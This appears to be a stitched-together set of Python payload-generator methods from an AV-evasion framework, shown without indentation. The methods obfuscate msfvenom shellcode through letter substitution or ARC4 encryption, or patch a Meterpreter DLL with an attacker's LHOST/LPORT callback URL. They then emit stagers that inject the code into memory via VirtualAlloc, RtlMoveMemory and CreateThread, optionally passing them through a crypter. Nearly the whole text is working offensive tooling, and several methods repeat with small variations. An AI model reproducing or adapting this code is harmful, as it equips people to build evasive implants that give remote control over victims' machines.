payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
# VirtualAlloc() injection
else:
payloadCode += 'import ctypes,base64,zlib\n'
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
randPtr = randomizer.randomString()
randBuf = randomizer.randomString()
randHt = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
#Random letter substition variables
hex_letters = "abcdef"
non_hex_letters = "ghijklmnopqrstuvwyz"
encode_with_this = random.choice(hex_letters)
decode_with_this = random.choice(non_hex_letters)
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
subbed_shellcode_variable_name = randomizer.randomString()
shellcode_variable_name = randomizer.randomString()
rand_ptr = randomizer.randomString()
rand_buf = randomizer.randomString()
rand_ht = randomizer.randomString()
rand_decoded_letter = randomizer.randomString()
rand_correct_letter = randomizer.randomString()
rand_sub_scheme = randomizer.randomString()
# Create Letter Substitution Scheme
sub_scheme = string.maketrans(encode_with_this, decode_with_this)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
if self.required_options["inject_method"][0].lower() == "virtual":
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
else:
#Additional random variable names
rand_reverse_shell = randomizer.randomString()
rand_memory_shell = randomizer.randomString()
rand_shellcode = randomizer.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += rand_shellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
else:
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, "rb")
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = (
"https://"
+ self.required_options["LHOST"][0]
+ ":"
+ str(self.required_options["LPORT"][0])
+ "/"
+ self.genHTTPChecksum()
+ "_"
+ randomizer.randomString(16)
+ "/\x00"
)
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
expirationTimeout = struct.pack("<I", 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
communicationTimeout = struct.pack("<I", 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
# VirtualAlloc() injection
else:
payloadCode += "import ctypes,base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
randPtr = randomizer.randomString()
randBuf = randomizer.randomString()
randHt = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
payloadCode += (
randPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ randVarName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
payloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ randPtr
+ "),"
+ randBuf
+ ",ctypes.c_int(len("
+ randVarName
+ ")))\n"
)
payloadCode += (
randHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ randPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
#Random letter substition variables
hex_letters = "abcdef"
non_hex_letters = "ghijklmnopqrstuvwyz"
encode_with_this = random.choice(hex_letters)
decode_with_this = random.choice(non_hex_letters)
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
subbed_shellcode_variable_name = randomizer.randomString()
shellcode_variable_name = randomizer.randomString()
rand_ptr = randomizer.randomString()
rand_buf = randomizer.randomString()
rand_ht = randomizer.randomString()
rand_decoded_letter = randomizer.randomString()
rand_correct_letter = randomizer.randomString()
rand_sub_scheme = randomizer.randomString()
# Create Letter Substitution Scheme
sub_scheme = string.maketrans(encode_with_this, decode_with_this)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
if self.required_options["inject_method"][0].lower() == "virtual":
# Create Payload File
payload_code = 'import ctypes\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
else:
#Additional random variable names
rand_reverse_shell = randomizer.randomString()
rand_memory_shell = randomizer.randomString()
rand_shellcode = randomizer.randomString()
# Create Payload File
payload_code = 'from ctypes import *\n'
payload_code += 'from string import maketrans\n'
payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(
sub_scheme) + '\"\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
payload_code += rand_shellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
payload_code = crypters.pyherion(payload_code)
return payload_code
def generate(self):
metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTP\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName+"()\n"
if self.required_options["use_encrypter"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandARCKey = randomizer.randomString()
RandARCPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
# Set IV Value and ARC Key
iv = randomizer.randomKey(8)
ARCKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
arc4main = ARC4.new(ARCKey)
EncShellCode = arc4main.encrypt(Shellcode)
PayloadCode = 'from Crypto.Cipher import ARC4\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
